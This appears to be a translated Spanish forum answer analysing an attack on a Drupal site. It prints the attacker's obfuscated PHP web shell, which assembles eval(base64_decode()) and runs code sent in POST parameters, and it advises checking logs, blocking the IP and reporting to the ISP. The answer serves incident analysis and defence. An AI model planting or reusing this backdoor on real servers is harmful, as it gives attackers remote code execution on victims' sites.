Parece que el atacante intenta descargar el script desde este sitio web (https://pastebin.com/raw/PeBdUg98) a su servidor:
Esto es el script (es seguro hacer clic en este enlace):
<?php
$st = 'return value';
$cap='bas'.'e6'.'4_d'.'ec'.'ode';
$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
if(isset($_POST['uf']) && isset($_POST['pr'])) {
$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
array_walk($arr, strval($_POST['pr']), '');
}
?>
Y en la segunda llamada (a este script - es seguro hacer clic en el enlace) intenta ejecutar un parche en tu drupal.
No creo que pueda hacer que funcione, pero puedes imitar lo que está haciendo en un sitio web ficticio que verás y ver si realmente funciona.
Puede revisar sus registros de acceso y si todas las llamadas provienen de la misma IP, bloquéelo y haga una búsqueda IP inversa para intente encontrar más información sobre el atacante, posiblemente informe a su ISP.
Aunque no es phishing, también puede intentar enviar un informe aquí: enlace
Buen trabajo para mantenerte en la última versión de Drupal: si has instalado complementos, intenta mantener también su última versión.